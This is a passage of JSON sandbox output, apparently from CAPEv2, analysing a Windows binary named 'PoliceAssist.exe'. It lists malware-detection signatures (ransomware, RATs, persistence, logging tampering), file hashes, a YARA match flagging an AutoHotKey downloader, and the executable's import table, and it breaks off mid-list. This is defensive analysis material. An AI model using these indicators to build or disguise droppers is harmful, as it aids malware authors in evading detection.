"office_macro", "time": 0.0 }, { "name": "changes_trust_center_settings", "time": 0.0 }, { "name": "disables_vba_trust_access", "time": 0.0 }, { "name": "office_macro_autoexecution", "time": 0.0 }, { "name": "office_macro_ioc", "time": 0.0 }, { "name": "office_macro_malicious_prediction", "time": 0.0 }, { "name": "office_macro_suspicious", "time": 0.0 }, { "name": "rtf_aslr_bypass", "time": 0.0 }, { "name": "rtf_anomaly_characterset", "time": 0.0 }, { "name": "rtf_anomaly_version", "time": 0.0 }, { "name": "rtf_embedded_content", "time": 0.0 }, { "name": "rtf_embedded_office_file", "time": 0.0 }, { "name": "rtf_exploit_static", "time": 0.0 }, { "name": "office_security", "time": 0.0 }, { "name": "accesses_office_username", "time": 0.0 }, { "name": "office_anomalous_feature", "time": 0.0 }, { "name": "office_dde_command", "time": 0.0 }, { "name": "packer_armadillo_mutex", "time": 0.0 }, { "name": "packer_armadillo_regkey", "time": 0.001 }, { "name": "persistence_ads", "time": 0.0 }, { "name": "persistence_safeboot", "time": 0.0 }, { "name": "persistence_ifeo", "time": 0.0 }, { "name": "persistence_silent_process_exit", "time": 0.0 }, { "name": "persistence_rdp_registry", "time": 0.0 }, { "name": "persistence_rdp_shadowing", "time": 0.0 }, { "name": "persistence_service", "time": 0.0 }, { "name": "persistence_shim_database", "time": 0.0 }, { "name": "powerpool_mutexes", "time": 0.0 }, { "name": "powershell_scriptblock_logging", "time": 0.0 }, { "name": "powershell_command_suspicious", "time": 0.0 }, { "name": "powershell_history_save_mod", "time": 0.0 }, { "name": "powershell_renamed", "time": 0.0 }, { "name": "powershell_reversed", "time": 0.0 }, { "name": "powershell_variable_obfuscation", "time": 0.0 }, { "name": "prevents_safeboot", "time": 0.0 }, { "name": "cmdline_process_discovery", "time": 0.0 }, { "name": "cryptomix_mutexes", "time": 0.0 }, { "name": "dharma_mutexes", "time": 0.0 }, { "name": "ransomware_extensions", "time": 0.006 }, { "name": "ransomware_files", "time": 0.008 }, { "name": "fonix_mutexes", "time": 0.0 }, { "name": "gandcrab_mutexes", "time": 0.0 }, { "name": "germanwiper_mutexes", "time": 0.0 }, { "name": "medusalocker_mutexes", "time": 0.0 }, { "name": "medusalocker_regkeys", "time": 0.001 }, { "name": "nemty_mutexes", "time": 0.0 }, { "name": "nemty_regkeys", "time": 0.0 }, { "name": "pysa_mutexes", "time": 0.0 }, { "name": "ransomware_radamant", "time": 0.0 }, { "name": "ransomware_recyclebin", "time": 0.0 }, { "name": "revil_mutexes", "time": 0.001 }, { "name": "ransomware_revil_regkey", "time": 0.0 }, { "name": "satan_mutexes", "time": 0.0 }, { "name": "snake_ransom_mutexes", "time": 0.0 }, { "name": "stop_ransom_mutexes", "time": 0.0 }, { "name": "stop_ransomware_cmd", "time": 0.0 }, { "name": "ransomware_stopdjvu", "time": 0.0 }, { "name": "rat_beebus_mutexes", "time": 0.0 }, { "name": "blacknet_mutexes", "time": 0.0 }, { "name": "blackrat_mutexes", "time": 0.0 }, { "name": "crat_mutexes", "time": 0.0 }, { "name": "dcrat_files", "time": 0.0 }, { "name": "dcrat_mutexes", "time": 0.0 }, { "name": "rat_fynloski_mutexes", "time": 0.0 }, { "name": "limerat_mutexes", "time": 0.0 }, { "name": "limerat_regkeys", "time": 0.002 }, { "name": "lodarat_file_behavior", "time": 0.0 }, { "name": "modirat_behavior", "time": 0.001 }, { "name": "njrat_regkeys", "time": 0.0 }, { "name": "obliquerat_files", "time": 0.001 }, { "name": "obliquerat_mutexes", "time": 0.0 }, { "name": "parallax_mutexes", "time": 0.0 }, { "name": "rat_pcclient", "time": 0.001 }, { "name": "rat_plugx_mutexes", "time": 0.0 }, { "name": "rat_poisonivy_mutexes", "time": 0.0 }, { "name": "rat_quasar_mutexes", "time": 0.0 }, { "name": "ratsnif_mutexes", "time": 0.0 }, { "name": "rat_spynet", "time": 0.001 }, { "name": "venomrat_mutexes", "time": 0.0 }, { "name": "warzonerat_files", "time": 0.0 }, { "name": "warzonerat_regkeys", "time": 0.001 }, { "name": "xpertrat_files", "time": 0.0 }, { "name": "xpertrat_mutexes", "time": 0.0 }, { "name": "rat_xtreme_mutexes", "time": 0.0 }, { "name": "recon_fingerprint", "time": 0.002 }, { "name": "remcos_files", "time": 0.0 }, { "name": "remcos_mutexes", "time": 0.0 }, { "name": "remcos_regkeys", "time": 0.001 }, { "name": "rdptcp_key", "time": 0.0 }, { "name": "uses_rdp_clip", "time": 0.0 }, { "name": "uses_remote_desktop_session", "time": 0.0 }, { "name": "removes_networking_icon", "time": 0.0 }, { "name": "removes_pinned_programs", "time": 0.0 }, { "name": "removes_security_maintenance_icon", "time": 0.0 }, { "name": "removes_startmenu_defaults", "time": 0.0 }, { "name": "removes_username_startmenu", "time": 0.0 }, { "name": "spicyhotpot_behavior", "time": 0.0 }, { "name": "sniffer_winpcap", "time": 0.0 }, { "name": "spreading_autoruninf", "time": 0.0 }, { "name": "stealth_hidden_extension", "time": 0.0 }, { "name": "stealth_hiddenreg", "time": 0.0 }, { "name": "stealth_hide_notifications", "time": 0.0 }, { "name": "stealth_webhistory", "time": 0.0 }, { "name": "sysinternals_psexec", "time": 0.0 }, { "name": "sysinternals_tools", "time": 0.0 }, { "name": "language_check_registry", "time": 0.0 }, { "name": "tampers_etw", "time": 0.001 }, { "name": "lsa_tampering", "time": 0.0 }, { "name": "tampers_powershell_logging", "time": 0.0 }, { "name": "targeted_flame", "time": 0.0 }, { "name": "territorial_disputes_sigs", "time": 0.055 }, { "name": "trickbot_mutex", "time": 0.0 }, { "name": "fleercivet_mutex", "time": 0.0 }, { "name": "lokibot_mutexes", "time": 0.001 }, { "name": "ursnif_behavior", "time": 0.001 }, { "name": "uses_adfind", "time": 0.0 }, { "name": "uses_ms_protocol", "time": 0.0 }, { "name": "neshta_mutexes", "time": 0.0 }, { "name": "renamer_mutexes", "time": 0.0 }, { "name": "owa_web_shell_files", "time": 0.0 }, { "name": "web_shell_files", "time": 0.0 }, { "name": "web_shell_processes", "time": 0.0 }, { "name": "dotnet_csc_build", "time": 0.0 }, { "name": "mavinject_lolbin", "time": 0.0 }, { "name": "multiple_explorer_instances", "time": 0.0 }, { "name": "script_tool_executed", "time": 0.0 }, { "name": "suspicious_certutil_use", "time": 0.0 }, { "name": "suspicious_command_tools", "time": 0.001 }, { "name": "suspicious_mpcmdrun_use", "time": 0.0 }, { "name": "suspicious_ping_use", "time": 0.0 }, { "name": "uses_powershell_copyitem", "time": 0.0 }, { "name": "uses_windows_utilities", "time": 0.001 }, { "name": "uses_windows_utilities_appcmd", "time": 0.0 }, { "name": "uses_windows_utilities_csvde_ldifde", "time": 0.0 }, { "name": "uses_windows_utilities_cipher", "time": 0.0 }, { "name": "uses_windows_utilities_clickonce", "time": 0.0 }, { "name": "uses_windows_utilities_curl", "time": 0.0 }, { "name": "uses_windows_utilities_dsquery", "time": 0.0 }, { "name": "uses_windows_utilities_esentutl", "time": 0.0 }, { "name": "uses_windows_utilities_finger", "time": 0.0 }, { "name": "uses_windows_utilities_mode", "time": 0.0 }, { "name": "uses_windows_utilities_ntdsutil", "time": 0.0 }, { "name": "uses_windows_utilities_nltest", "time": 0.0 }, { "name": "uses_windows_utilities_xcopy", "time": 0.0 }, { "name": "wmic_command_suspicious", "time": 0.0 }, { "name": "scrcons_wmi_script_consumer", "time": 0.0 }, { "name": "allaple_mutexes", "time": 0.0 } ], "reporting": [ { "name": "BinGraph", "time": 0.0 } ] }, "target": { "category": "file", "file": { "name": "PoliceAssist.exe", "path": "/opt/CAPEv2/storage/binaries/67f06666b122cdba28954592ec2c52964d0fbbc48e39974cedde8ef7a508dd9d", "guest_paths": "", "size": 1239040, "crc32": "16BB423F", "md5": "ef6987bd5b4f3d74b8be32886b5ea6b9", "sha1": "441fdcf973599dd39627e41607ea92ce2c75ff6e", "sha256": "67f06666b122cdba28954592ec2c52964d0fbbc48e39974cedde8ef7a508dd9d", "sha512": "4a633957c21aec0633484230a0102a4d9e55b25f0735e0f6dfac8845feb22d0f8f29b9d97fbbd08a2c47a1f9f59023be67a70889ddd4a3718d44a5edae8f26d3", "rh_hash": null, "ssdeep": "24576:+dofGAmSIQ177wZ+A7MjiiRDXU/Sat5RgsLSmIOHsU5zMmX1xYwncqKvGqVUy:+dofGbSIQ177wZvYjiiRDXASat5RgsLw", "type": "PE32+ executable (GUI) x86-64, for MS Windows", "yara": [ { "name": "INDICATOR_SUSPICIOUS_AHK_Downloader", "meta": { "description": "Detects AutoHotKey binaries acting as second stage droppers", "author": "ditekSHen" }, "strings": [ "URLDownloadToFile, http", ">\u0000A\u0000U\u0000T\u0000O\u0000H\u0000O\u0000T\u0000K\u0000E\u0000Y\u0000 \u0000S\u0000C\u0000R\u0000I\u0000P\u0000T\u0000<\u0000", "o\u0000p\u0000e\u0000n\u0000 \u0000\"\u0000%\u0000s\u0000\"\u0000 \u0000a\u0000l\u0000i\u0000a\u0000s\u0000 \u0000A\u0000H\u0000K\u0000_\u0000P\u0000l\u0000a\u0000y\u0000M\u0000e\u0000", "A\u0000H\u0000K\u0000 \u0000K\u0000e\u0000y\u0000b\u0000d\u0000", "A\u0000H\u0000K\u0000 \u0000M\u0000o\u0000u\u0000s\u0000e\u0000" ], "addresses": { "d1": 1231325, "s1": 1204786, "s2": 970512, "s3": 934072 } } ], "cape_yara": [], "clamav": [], "tlsh": "T134458D0733A6C0E8DF6790F2CA295223D7727814173897DB64E0692DDFA3EA15B3A711", "sha3_384": "edc36951bf16d92485aa745abe6f9aa1bbfc41198ddf245a35c5a44ef489b92d1dd91c5e11d0bc0391317f994f09be6f", "pe": { "guest_signers": { "aux_sha1": null, "aux_timestamp": null, "aux_valid": false, "aux_error": true, "aux_error_desc": "No signature found.", "aux_signers": [] }, "digital_signers": [], "imagebase": "0x140000000", "entrypoint": "0x000cdb10", "ep_bytes": "4883ec28e8076600004883c428e952fe", "peid_signatures": null, "reported_checksum": "0x00000000", "actual_checksum": "0x0013bc6e", "osversion": "5.2", "pdbpath": null, "imports": { "WSOCK32": { "dll": "WSOCK32.dll", "imports": [ { "address": "0x1400e0e30", "name": "gethostbyname" }, { "address": "0x1400e0e38", "name": "inet_ntoa" }, { "address": "0x1400e0e40", "name": "WSACleanup" }, { "address": "0x1400e0e48", "name": "gethostname" }, { "address": "0x1400e0e50", "name": "WSAStartup" } ] }, "WINMM": { "dll": "WINMM.dll", "imports": [ { "address": "0x1400e0dc8", "name": "mixerGetLineInfoW" }, { "address": "0x1400e0dd0", "name": "mixerGetDevCapsW" }, { "address": "0x1400e0dd8", "name": "mixerOpen" }, { "address": "0x1400e0de0", "name": "mciSendStringW" }, { "address": "0x1400e0de8", "name": "joyGetPosEx" }, { "address": "0x1400e0df0", "name": "mixerGetLineControlsW" }, { "address": "0x1400e0df8", "name": "mixerGetControlDetailsW" }, { "address": "0x1400e0e00", "name": "mixerSetControlDetails" }, { "address": "0x1400e0e08", "name": "waveOutGetVolume" }, { "address": "0x1400e0e10", "name": "mixerClose" }, { "address": "0x1400e0e18", "name": "waveOutSetVolume" }, { "address": "0x1400e0e20", "name": "joyGetDevCapsW" } ] }, "VERSION": { "dll": "VERSION.dll", "imports": [ { "address": "0x1400e0d78", "name": "GetFileVersionInfoW" }, { "address": "0x1400e0d80", "name": "VerQueryValueW" }, { "address": "0x1400e0d88", "name": "GetFileVersionInfoSizeW" } ] }, "COMCTL32": { "dll": "COMCTL32.dll", "imports": [ { "address": "0x1400e00a0", "name": "ImageList_Create" }, { "address": "0x1400e00a8", "name": "CreateStatusWindowW" }, { "address": "0x1400e00b0", "name": "ImageList_ReplaceIcon" }, { "address": "0x1400e00b8", "name": "ImageList_GetIconSize" }, { "address": "0x1400e00c0", "name": "ImageList_Destroy" }, { "address": "0x1400e00c8", "name": "ImageList_AddMasked" } ] }, "PSAPI": { "dll": "PSAPI.DLL", "imports": [ { "address": "0x1400e0780", "name": "GetProcessImageFileNameW" }, { "address": "0x1400e0788", "name": "GetModuleBaseNameW" }, { "address": "0x1400e0790", "name": "GetModuleFileNameExW" } ] }, "WININET": { "dll": "WININET.dll", "imports": [ { "address": "0x1400e0d98", "name": "InternetOpenW" }, { "address": "0x1400e0da0", "name": "InternetOpenUrlW" }, { "address": "0x1400e0da8", "name": "InternetCloseHandle" }, { "address": "0x1400e0db0", "name": "InternetReadFileExA" }, { "address": "0x1400e0db8", "name": "InternetReadFile" } ] }, "KERNEL32": { "dll": "KERNEL32.dll", "imports": [ { "address": "0x1400e0210", "name": "GetModuleFileNameW" }, { "address": "0x1400e0218", "name": "GetSystemTimeAsFileTime" }, { "address": "0x1400e0220", "name": "FindResourceW" }, { "address": "0x1400e0228", "name": "SizeofResource" }, { "address": "0x1400e0230", "name": "LoadResource" }, { "address": "0x1400e0238", "name": "LockResource" }, { "address": "0x1400e0240", "name": "GetFullPathNameW" }, { "address": "0x1400e0248", "name": "GetShortPathNameW" }, { "address": "0x1400e0250", "name": "FindFirstFileW" }, { "address": "0x1400e0258", "name": "FindNextFileW" }, { "address": "0x1400e0260", "name": "FindClose" }, { "address": "0x1400e0268", "name": "FileTimeToLocalFileTime" }, { "address": "0x1400e0270", "name": "SetEnvironmentVariableW" }, { "address": "0x1400e0278", "name": "Beep" }, { "address": "0x1400e0280", "name": "MoveFileW" }, { "address": "0x1400e0288", "name": "OutputDebugStringW" }, { "address": "0x1400e0290", "name": "CreateProcessW" }, { "address": "0x1400e0298", "name": "GetFileAttributesW" }, { "address": "0x1400e02a0", "name": "WideCharToMultiByte" }, { "address": "0x1400e02a8", "name": "MultiByteToWideChar" }, { "address": "0x1400e02b0", "name": "GetExitCodeProcess" }, { "address": "0x1400e02b8", "name": "WriteProcessMemory" }, { "address": "0x1400e02c0", "name": "ReadProcessMemory" }, { "address": "0x1400e02c8", "name": "GetCurrentProcessId" }, { "address": "0x1400e02d0", "name": "OpenProcess" }, { "address": "0x1400e02d8", "name": "TerminateProcess" }, { "address": "0x1400e02e0", "name": "SetPriorityClass" }, { "address": "0x1400e02e8", "name": "SetLastError" }, { "address": "0x1400e02f0", "name": "GetEnvironmentVariableW" }, { "address": "0x1400e02f8", "name": "GetLocalTime" }, { "address": "0x1400e0300", "name": "GetDateFormatW" }, { "address": "0x1400e0308", "name": "GetTimeFormatW" }, { "address": "0x1400e0310", "name": "GetDiskFreeSpaceExW" }, { "address": "0x1400e0318", "name": "SetVolumeLabelW" }, { "address": "0x1400e0320", "name": "CreateFileW" }, { "address": "0x1400e0328", "name": "DeviceIoControl" }, { "address": "0x1400e0330", "name": "GetDriveTypeW" }, { "address": "0x1400e0338", "name": "GetVolumeInformationW" }, { "address": "0x1400e0340", "name": "GetDiskFreeSpaceW" }, { "address": "0x1400e0348", "name": "GetCurrentDirectoryW" }, { "address": "0x1400e0350", "name": "CreateDirectoryW" }, { "address": "0x1400e0358", "name": "ReadFile" }, { "address": "0x1400e0360", "name": "WriteFile" }, { "address": "0x1400e0368", "name": "DeleteFileW" }, { "address": "0x1400e0370", "name": "SetFileAttributesW" }, { "address": "0x1400e0378", "name": "LocalFileTimeToFileTime" }, { "address": "0x1400e0380", "name": "SetFileTime" }, { "address": "0x1400e0388", "name": "DeleteCriticalSection" }, { "address": "0x1400e0390", "name": "GetSystemTime" }, { "address": "0x1400e0398", "name": "GetSystemDefaultUILanguage" }, { "address": "0x1400e03a0", "name": "GetComputerNameW" }, { "address": "0x1400e03a8", "name": "GetSystemWindowsDirectoryW" }, { "address": "0x1400e03b0", "name": "GetTempPathW" }, { "address": "0x1400e03b8", "name": "EnterCriticalSection" }, { "address": "0x1400e03c0", "name": "LeaveCriticalSection" }, { "address": "0x1400e03c8", "name": "VirtualProtect" }, { "address": "0x1400e03d0", "name": "QueryDosDeviceW" }, { "address": "0x1400e03d8", "name": "CompareStringW" }, { "address": "0x1400e03e0", "name": "RemoveDirectoryW" }, { "address": "0x1400e03e8", "name": "CopyFileW" }, { "address": "0x1400e03f0", "name": "GetCurrentProcess" }, { "address": "0x1400e03f8", "name": "CreateToolhelp32Snapshot" }, { "address": "0x1400e0400", "name": "Process32FirstW" }, { "address": "0x1400e0408", "name": "Process32NextW" }, { "address": "0x1400e0410", "name": "FormatMessageW" }, { "address": "0x1400e0418", "name": "GetPrivateProfileStringW" }, { "address": "0x1400e0420", "name": "GetPrivateProfileSectionW" }, { "address": "0x1400e0428", "name": "GetPrivateProfileSectionNamesW" }, { "address": "0x1400e0430", "name": "WritePrivateProfileStringW" }, { "address": "0x1400e0438", "name": "WritePrivateProfileSectionW" }, { "address": "0x1400e0440", "name": "SetEndOfFile" }, { "address": "0x1400e0448", "name": "GetACP" }, { "address": "0x1400e0450", "name": "GetFileType" }, { "address": "0x1400e0458", "name": "GetStdHandle" }, { "address": "0x1400e0460", "name": "SetFilePointerEx" }, { "address": "0x1400e0468", "name": "SystemTimeToFileTime" }, { "address": "0x1400e0470", "name": "FileTimeToSystemTime" }, { "address": "0x1400e0478", "name": "GetFileSize" }, { "address": "0x1400e0480", "name": "IsWow64Process" }, { "address": "0x1400e0488", "name": "VirtualAllocEx" }, { "address": "0x1400e0490", "name": "VirtualFreeEx" }, { "address": "0x1400e0498", "name": "EnumResourceNamesW" }, { "address": "0x1400e04a0", "name": "LoadLibraryExW" }, { "address": "0x1400e04a8", "name": "GlobalSize" }, { "address": "0x1400e04b0", "name": "HeapReAlloc" }, { "address": "0x1400e04b8", "name": "EncodePointer" }, { "address": "0x1400e04c0", "name": "HeapFree" }, { "address": "0x1400e04c8", "name": "DecodePointer" }, { "address": "0x1400e04d0", "name": "ExitProcess" }, { "address": "0x1400e04d8", "name": "HeapAlloc" }, { "address": "0x1400e04e0", "name": "IsValidCodePage" }, { "address": "0x1400e04e8", "name": "FlsGetValue" }, { "address": "0x1400e04f0", "name": "FlsSetValue" }, { "address": "0x1400e04f8", "name": "FlsFree" }, { "address": "0x1400e0500", "name": "FlsAlloc" }, { "address": "0x1400e0508", "name": "UnhandledExceptionFilter" }, { "address": "0x1400e0510", "name": "SetUnhandledExceptionFilter" }, { "address": "0x1400e0518", "name": "IsDebuggerPresent" }, { "address": "0x1400e0520", "name": "RtlVirtualUnwind" }, { "address": "0x1400e0528", "name": "RtlLookupFunctionEntry" }, { "address": "0x1400e0530", "name": "InitializeCriticalSection" }, { "address": "0x1400e0538", "name": "GetCPInfo" }, { "address": "0x1400e0540", "name": "GetVersionExW" }, { "address": "0x1400e0548", "name": "GetModuleHandleW" }, { "address": "0x1400e0550", "name": "FreeLibrary" }, { "address": "0x1400e0558", "name": "GetProcAddress" }, { "address": "0x1400e0560", "name": "LoadLibraryW" }, { "address": "0x1400e0568", "name": "GetLastError" }, { "address": "0x1400e0570", "name": "CreateMutexW" }, { "address": "0x1400e0578", "name": "CloseHandle" }, { "address": "0x1400e0580", "name": "GetExitCodeThread" }, { "address": "0x1400e0588", "name": "SetThreadPriority" }, { "address": "0x1400e0590", "name": "CreateThread" }, { "address": "0x1400e0598", "name": "GetStringTypeExW" }, { "address": "0x1400e05a0", "name": "lstrcmpiW" }, { "address": "0x1400e05a8", "name": "GetCurrentThreadId" }, { "address": "0x1400e05b0", "name": "GlobalUnlock" }, { "address": "0x1400e05b8", "name": "GlobalFree" }, { "address": "0x1400e05c0", "name": "GlobalAlloc" }, { "address": "0x1400e05c8", "name": "GlobalLock" }, { "address": "0x1400e05d0", "name": "SetErrorMode" }, { "address": "0x1400e05d8", "name": "SetCurrentDirectoryW" }, { "address": "0x1400e05e0", "name": "Sleep" }, { "address": "0x1400e05e8", "name": "GetTickCount" }, { "address": "0x1400e05f0", "name": "MulDiv" }, { "address": "0x1400e05f8", "name": "RtlCaptureContext" }, { "address": "0x1400e0600", "name": "HeapSetInformation" }, { "address": "0x1400e0608", "name": "GetVersion" }, { "address": "0x1400e0610", "name": "HeapCreate" }, { "address": "0x1400e0618", "name": "InitializeCriticalSectionAndSpinCount" }, { "address": "0x1400e0620", "name": "HeapSize" }, { "address": "0x1400e0628", "name": "HeapQueryInformation" }, { "address": "0x1400e0630", "name": "GetCommandLineW" }, { "address": "0x1400e0638", "name": "GetStartupInfoW" }, { "address": "0x1400e0640", "name": "RtlUnwindEx" }, { "address": "0x1400e0648", "name": "GetStringTypeW" }, { "address": "0x1400e0650", "name": "RaiseException" }, { "address": "0x1400e0658", "name": "RtlPcToFileHeader" }, { "address": "0x1400e0660", "name": "LCMapStringW" }, { "address": "0x1400e0668", "name": "GetConsoleCP" }, { "address": "0x1400e0670", "name": "GetConsoleMode" }, { "address": "0x1400e0678", "name": "FreeEnvironmentStringsW" }, { "address": "0x1400e0680", "name": "GetEnvironmentStringsW" }, { "address": "0x1400e0688", "name": "SetHandleCount" }, { "address": "0x1400e0690", "name": "QueryPerformanceCounter" }, { "address": "0x1400e0698", "name": "GetOEMCP" }, { "address": "0x1400e06a0", "name": "SetFilePointer" }, { "address": "0x1400e06a8", "name": "WriteConsoleW" }, { "address": "0x1400e06b0", "name": "SetStdHandle" }, { "address": "0x1400e06b8", "name": "FlushFileBuffers" }, { "address": "0x1400e06c0", "name": "GetFileSizeEx" }, { "address": "0x1400e06c8", "name": "GetProcessHeap" } ] }, "USER32": { "dll": "USER32.dll", "imports": [ { "address": "0x1400e0810", "name": "GetDlgItem" }, { "address": "0x1400e0818", "name": "SetDlgItemTextW" }, { "address": "0x1400e0820", "name": "MessageBeep" }, { "address": "0x1400e0828", "name": "GetCursorInfo" }, { "address": "0x1400e0830", "name": "GetLastInputInfo" }, { "address": "0x1400e0838", "name": "GetSystemMenu" }, { "address": "0x1400e0840", "name": "GetMenuItemCount" }, { "address": "0x1400e0848", "name": "GetMenuItemID" }, { "address": "0x1400e0850", "name": "GetSubMenu" }, { "address": "0x1400e0858", "name": "GetMenuStringW" }, { "address": "0x1400e0860", "name": "ExitWindowsEx" }, { "address": "0x1400e0868", "name": "SetMenu" }, { "address": "0x1400e0870", "name": "FlashWindow" }, { "address": "0x1400e0878", "name": "GetPropW" }, { "address": "0x1400e0880", "name": "SetPropW" }, { "address": "0x1400e0888", "name": "RemovePropW" }, { "address": "0x1400e0890", "name": "MapWindowPoints" }, { "address": "0x1400e0898", "name": "RedrawWindow" }, { "address": "0x1400e08a0", "name": "SetWindowLongPtrW" }, { "address": "0x1400e08a8", "name": "SetParent" }, { "address": "0x1400e08b0", "name": "GetClassInfoExW" }, { "address": "0x1400e08b8", "name": "DefDlgProcW" }, { "address": "0x1400e08c0", "name": "GetAncestor" }, { "address": "0x1400e08c8", "name": "UpdateWindow" }, { "address": "0x1400e08d0", "name": "GetMessagePos" }, { "address": "0x1400e08d8", "name": "GetClassLongPtrW" }, { "address": "0x1400e08e0", "name": "CallWindowProcW" }, { "address": "0x1400e08e8", "name": "CheckRadioButton" }, { "address": "0x1400e08f0", "name": "IntersectRect" }, { "address": "0x1400e08f8", "name": "GetUpdateRect" }, { "address": "0x1400e0900", "name": "PtInRect" }, { "address": "0x1400e0908", "name": "CreateDialogIndirectParamW" }, { "address": "0x1400e0910", "name": "GetWindowLongPtrW" }, { "address": "0x1400e0918", "name": "CreateAcceleratorTableW" }, { "address": "0x1400e0920", "name": "DestroyAcceleratorTable" }, { "address": "0x1400e0928", "name": "InsertMenuItemW" }, { "address": "0x1400e0930", "name": "SetMenuDefaultItem" }, { "address": "0x1400e0938", "name": "RemoveMenu" }, { "address": "0x1400e0940", "name": "SetMenuItemInfoW" }, { "address": "0x1400e0948", "name": "IsMenu" }, { "address": "0x1400e0950", "name": "GetMenuItemInfoW" }, { "address": "0x1400e0958", "name": "CreateMenu" }, { "address": "0x1400e0960", "name": "CreatePopupMenu" }, { "address": "0x1400e0968", "name": "SetMenuInfo" }, { "address": "0x1400e0970", "name": "AppendMenuW" }, { "address": "0x1400e0978", "name": "DestroyMenu" }, { "address": "0x1400e0980", "name": "TrackPopupMenuEx" }, { "address": "0x1400e0988", "name": "CopyImage" }, { "address": "0x1400e0990", "name": "CreateIconIndirect" }, { "address": "0x1400e0998", "name": "CreateIconFromResourceEx" }, { "address": "0x1400e09a0", "name": "EnumClipboardFormats" }, { "address": "0x1400e09a8", "name": "GetWindow" }, { "address": "0x1400e09b0", "name": "BringWindowToTop" }, { "address": "0x1400e09b8", "name": "MessageBoxW" }, { "address": "0x1400e09c0", "name": "GetTopWindow" }, { "address": "0x1400e09c8", "name": "GetQueueStatus" }, { "address": "0x1400e09d0", "name": "SendDlgItemMessageW" }, { "address": "0x1400e09d8", "name": "SetClipboardViewer" }, { "address": "0x1400e09e0", "name": "LoadAcceleratorsW" }, { "address": "0x1400e09e8", "name": "EnableMenuItem" }, { "address": "0x1400e09f0", "name": "GetMenu" }, { "address": "0x1400e09f8", "name": "CreateWindowExW" }, { "address": "0x1400e0a00", "name": "RegisterClassExW" }, { "address": "0x1400e0a08", "name": "LoadCursorW" }, { "address": "0x1400e0a10", "name": "DestroyWindow" }, { "address": "0x1400e0a18", "name": "EnableWindow" }, { "address": "0x1400e0a20", "name": "MapVirtualKeyW" }, { "address": "0x1400e0a28", "name": "VkKeyScanExW" }, { "address": "0x1400e0a30", "name": "MapVirtualKeyExW" }, { "address": "0x1400e0a38", "name": "GetKeyboardLayoutNameW" }, { "address": "0x1400e0a40", "name": "ActivateKeyboardLayout" }, { "address": "0x1400e0a48", "name": "GetGUIThreadInfo" }, { "address": "0x1400e0a50", "name": "GetWindowTextW" }, { "address": "0x1400e0a58", "name": "mouse_event" }, { "address": "0x1400e0a60", "name": "WindowFromPoint" }, { "address": "0x1400e0a68", "name": "GetSystemMetrics" }, { "address": "0x1400e0a70", "name": "keybd_event" }, { "address": "0x1400e0a78", "name": "SetKeyboardState" }, { "address": "0x1400e0a80", "name": "GetKeyboardState" }, { "address": "0x1400e0a88", "name": "GetCursorPos" }, { "address": "0x1400e0a90", "name": "GetAsyncKeyState" }, { "address": "0x1400e0a98", "name": "AttachThreadInput" }, { "address": "0x1400e0aa0", "name": "SendInput" }, { "address": "0x1400e0aa8", "name": "UnregisterHotKey" }, { "address": "0x1400e0ab0", "name": "RegisterHotKey" }, { "address": "0x1400e0ab8", "name": "SendMessageTimeoutW" }, { "address": "0x1400e0ac0", "name": "UnhookWindowsHookEx" }, { "address": "0x1400e0ac8", "name": "SetWindowsHookExW" }, { "address": "0x1400e0ad0", "name": "PostThreadMessageW" }, { "address": "0x1400e0ad8", "name": "IsCharAlphaNumericW" }, { "address": "0x1400e0ae0", "name": "IsCharUpperW" }, { "address": "0x1400e0ae8", "name": "IsCharLowerW" }, { "address": "0x1400e0af0", "name": "ToUnicodeEx" }, { "address": "0x1400e0af8", "name": "GetKeyboardLayout" }, { "address": "0x1400e0b00", "name": "CallNextHookEx" }, { "address": "0x1400e0b08", "name": "CharLowerW" }, { "address": "0x1400e0b10", "name": "ReleaseDC" }, { "address": "0x1400e0b18", "name": "GetDC" }, { "address": "0x1400e0b20", "name": "OpenClipboard" }, { "address": "0x1400e0b28", "name": "GetClipboardData" }, { "address": "0x1400e0b30", "name": "GetClipboardFormatNameW" }, { "address": "0x1400e0b38", "name": "CloseClipboard" }, { "address": "0x1400e0b40", "name": "SetClipboardData" }, { "address": "0x1400e0b48", "name": "EmptyClipboard" }, { "address": "0x1400e0b50", "name": "PostMessageW" }, { "address": "0x1400e0b58", "name": "FindWindowW" }, { "address": "0x1400e0b60", "name": "EndDialog" }, { "address": "0x1400e0b68", "name": "IsWindow" }, { "address": "0x1400e0b70", "name": "DispatchMessageW" }, { "address": "0x1400e0b78", "name": "TranslateMessage" }, { "address": "0x1400e0b80", "name": "ShowWindow" }, { "address": "0x1400e0b88", "name": "CountClipboardFormats" }, { "address": "0x1400e0b90", "name": "SetWindowLongW" }, { "address": "0x1400e0b98", "name": "ScreenToClient" }, { "address": "0x1400e0ba0", "name": "IsDialogMessageW" }, { "address": "0x1400e0ba8", "name": "DialogBoxParamW" }, { "address": "0x1400e0bb0", "name": "SetForegroundWindow" }, { "address": "0x1400e0bb8", "name": "DefWindowProcW" }, { "address": "0x1400e0bc0", "name": "FillRect" }, { "address": "0x1400e0bc8", "name": "DrawIconEx" }, { "address": "0x1400e0bd0", "name": "GetSysColorBrush" }, { "address": "0x1400e0bd8", "name": "GetSysColor" }, { "address": "0x1400e0be0", "name": "RegisterWindowMessageW" }, { "address": "0x1400e0be8", "name": "EnumDisplayMonitors" }, { "address": "0x1400e0bf0", "name": "IsIconic" }, { "address": "0x1400e0bf8", "name": "IsZoomed" }, { "address": "0x1400e0c00", "name": "EnumWindows" }, { "address": "0x1400e0c08", "name": "ChangeClipboardChain" }, { "address": "0x1400e0c10", "name": "GetWindowTextLengthW" }, { "address": "0x1400e0c18", "name": "SendMessageW" }, { "address": "0x1400e0c20", "name": "IsWindowEnabled" }, { "address": "0x1400e0c28", "name": "GetWindowLongW" }, { "address": "0x1400e0c30", "name": "GetKeyState" }, { "address": "0x1400e0c38", "name": "TranslateAcceleratorW" }, { "address": "0x1400e0c40", "name": "KillTimer" }, { "address": "0x1400e0c48", "name": "PeekMessageW" }, { "address": "0x1400e0c50", "name": "GetFocus" }, { "address": "0x1400e0c58", "name": "GetClassNameW" }, { "address": "0x1400e0c60", "name": "GetWindowThreadProcessId" }, { "address": "0x1400e0c68", "name": "GetForegroundWindow" }, { "address": "0x1400e0c70", "name": "InvalidateRect" }, { "address": "0x1400e0c78", "name": "SetLayeredWindowAttributes" }, { "address": "0x1400e0c80", "name": "SetWindowPos" }, { "address": "0x1400e0c88", "name": "SetWindowRgn" }, { "address": "0x1400e0c90", "name": "SetFocus" }, { "address": "0x1400e0c98", "name": "SetActiveWindow" }, { "address": "0x1400e0ca0", "name": "ClientToScreen" }, { "address": "0x1400e0ca8", "name": "EnumChildWindows" }, { "address": "0x1400e0cb0", "name": "MoveWindow" }, { 